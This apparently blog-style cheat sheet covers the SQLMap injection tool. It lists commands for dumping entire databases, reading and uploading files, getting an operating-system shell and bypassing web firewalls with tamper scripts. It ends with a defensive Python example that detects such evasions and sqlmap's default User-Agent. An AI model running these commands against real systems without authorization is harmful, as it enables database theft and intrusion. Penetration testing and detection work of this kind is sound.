
SQLMap Cheat Sheet


What is SQLMap?

SQLMap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection flaws and the takeover of database servers.


Basic SQLMap Commands

| Command | Description |
| --- | --- |
| sqlmap -u <URL> | Scan the URL for SQL injection vulnerabilities |
| sqlmap -r <request_file> | Scan from a saved HTTP request file |
| sqlmap -u <URL> --dbs | List available databases on the target |
| sqlmap -u <URL> -D <db_name> --tables | List tables in a specific database |
| sqlmap -u <URL> -D <db_name> -T <table_name> --columns | List columns in a specific table |
| sqlmap -u <URL> -D <db_name> -T <table_name> -C <columns> --dump | Dump data from specific columns |
| sqlmap -u <URL> --dump-all | Dump the entire database |
| sqlmap -u <URL> --os-shell | Get a command shell on the operating system |
| sqlmap -u <URL> --dbms <DBMS> | Force SQLMap to use a specific database management system (e.g., MySQL, PostgreSQL) |

Advanced Usage

1. Specifying Data Parameters

If the vulnerable parameter isn't in the URL, you can specify it manually.

| Command | Description |
| --- | --- |
| sqlmap -u <URL> --data="param1=value1&param2=value2" | Inject SQL into POST request parameters |
| sqlmap -u <URL> --method PUT --data="param1=value1" | Use HTTP PUT method with SQLMap |

2. Cookie-based SQL Injection

If the vulnerability is within the cookies, you can pass the cookie values.

| Command | Description |
| --- | --- |
| sqlmap -u <URL> --cookie="PHPSESSID=abcd1234" | Use cookies to authenticate and test for vulnerabilities |

3. Scan with Specific User-Agent

| Command | Description |
| --- | --- |
| sqlmap -u <URL> --user-agent="Mozilla/5.0" | Spoof the User-Agent header in the request |

4. Use a Proxy

| Command | Description |
| --- | --- |
| sqlmap -u <URL> --proxy="http://localhost:8080" | Route the SQLMap traffic through a proxy (e.g., Burp Suite) |

Enumeration

1. Get Database Version

sqlmap -u <URL> --banner

2. List Databases

sqlmap -u <URL> --dbs

3. List Tables in a Specific Database

sqlmap -u <URL> -D <db_name> --tables

4. List Columns in a Specific Table

sqlmap -u <URL> -D <db_name> -T <table_name> --columns

5. Dump Table Data

sqlmap -u <URL> -D <db_name> -T <table_name> --dump

6. Dump Specific Columns

sqlmap -u <URL> -D <db_name> -T <table_name> -C <column1,column2> --dump

Exploitation Options

1. File System Access

| Command | Description |
| --- | --- |
| sqlmap -u <URL> --file-read <file> | Read a file from the target's file system |
| sqlmap -u <URL> --file-write <local_file> --file-dest <remote_file> | Upload a file to the target |

2. Command Shell

| Command | Description |
| --- | --- |
| sqlmap -u <URL> --os-shell | Get an interactive operating system shell on the target |

3. Out-of-Band Connections

| Command | Description |
| --- | --- |
| sqlmap -u <URL> --dns-domain=<domain> | Perform out-of-band (OOB) interaction via DNS |
| sqlmap -u <URL> --dns-server=<server> | Specify a DNS server for OOB interactions |

Other Useful Flags

| Command | Description |
| --- | --- |
| sqlmap -u <URL> --batch | Run non-interactively, accepting the default answer to each prompt (useful for automation) |
| sqlmap -u <URL> --tamper=<tamper_script> | Use tamper scripts to bypass WAF/IDS (e.g., --tamper=space2comment) |
| sqlmap -u <URL> --level=<level> | Set the level of tests (1 to 5, higher levels test more parameters) |
| sqlmap -u <URL> --risk=<risk> | Set the risk level of tests (1 to 3, higher risks may cause more intrusive operations) |
| sqlmap -u <URL> --random-agent | Use a randomly chosen User-Agent string |

Example Commands

1. Basic SQL Injection Scan

sqlmap -u "http://example.com/index.php?id=1"

2. Dump Entire Database

sqlmap -u "http://example.com/index.php?id=1" --dump-all

3. Dump Specific Database Table

sqlmap -u "http://example.com/index.php?id=1" -D testdb -T users --dump

4. Bypass WAF Using Tamper Script

sqlmap -u "http://example.com/index.php?id=1" --tamper=space2comment

Tamper Scripts

Tamper scripts can help you bypass Web Application Firewalls (WAFs) by modifying SQL queries. Some common tamper scripts:

| Script | Description |
| --- | --- |
| space2comment.py | Replaces space characters with inline comments |
| between.py | Replaces SQL operators with the BETWEEN clause |
| randomcase.py | Randomizes the case of SQL keywords |

Usage Example:

sqlmap -u "http://example.com/index.php?id=1" --tamper=space2comment
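
Seen from the defending side, the space2comment and randomcase transformations described above only defeat filters that match the raw request text. The following is an added example, not part of the original cheat sheet or of SQLMap itself: a small Python check that normalizes a query string before matching. The sample requests, the single rule and all function names are constructed for illustration, and between.py is not covered.

```python
import re
from urllib.parse import unquote_plus

# Constructed (query string, User-Agent) pairs; not real traffic.
SAMPLES = [
    ("id=1", "Mozilla/5.0"),
    ("q=trade+union+news", "Mozilla/5.0"),
    ("id=1 UNION SELECT 1,2", "sqlmap/1.0 (https://sqlmap.org)"),
    ("id=1/**/UnIoN/**/sElEcT/**/1,2", "Mozilla/5.0"),
    ("id=1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FAlL%2F%2A%2A%2FSeLeCt%2F%2A%2A%2F1", "Mozilla/5.0"),
]

NAIVE_SIGNATURE = "UNION SELECT"  # literal, case-sensitive, one space
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
WHITESPACE = re.compile(r"\s+")
UNION_SELECT = re.compile(r"\bunion(?: all)? select\b")  # hypothetical single rule

def naive_match(query):
    """Signature applied to the decoded text with no normalization."""
    return NAIVE_SIGNATURE in unquote_plus(query)

def normalize(query):
    """Undo the two transformations named in the Tamper Scripts table."""
    text = unquote_plus(query)            # decode %2F, %2A, '+' and so on
    text = INLINE_COMMENT.sub(" ", text)  # space2comment: /**/ acts as a space
    text = WHITESPACE.sub(" ", text)      # collapse whitespace runs
    return text.lower()                   # randomcase: fold keyword case

def normalized_match(query):
    return bool(UNION_SELECT.search(normalize(query)))

def default_sqlmap_agent(user_agent):
    # Weak signal: only present when the scan ran without
    # --user-agent or --random-agent.
    return user_agent.lower().startswith("sqlmap/")

def triage(samples):
    """Return (query, naive hit, normalized hit, default UA) per request."""
    return [(q, naive_match(q), normalized_match(q), default_sqlmap_agent(ua))
            for q, ua in samples]

if __name__ == "__main__":
    for row in triage(SAMPLES):
        print(row)
```

The last two samples pass the naive signature and are caught only after normalization. Request inspection of this kind is a detection layer; parameterized queries in the application remain the fix for the injection itself.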

Written by

parrotassassin15

Cybersecurity professional and contributor at Lorikeet Security.
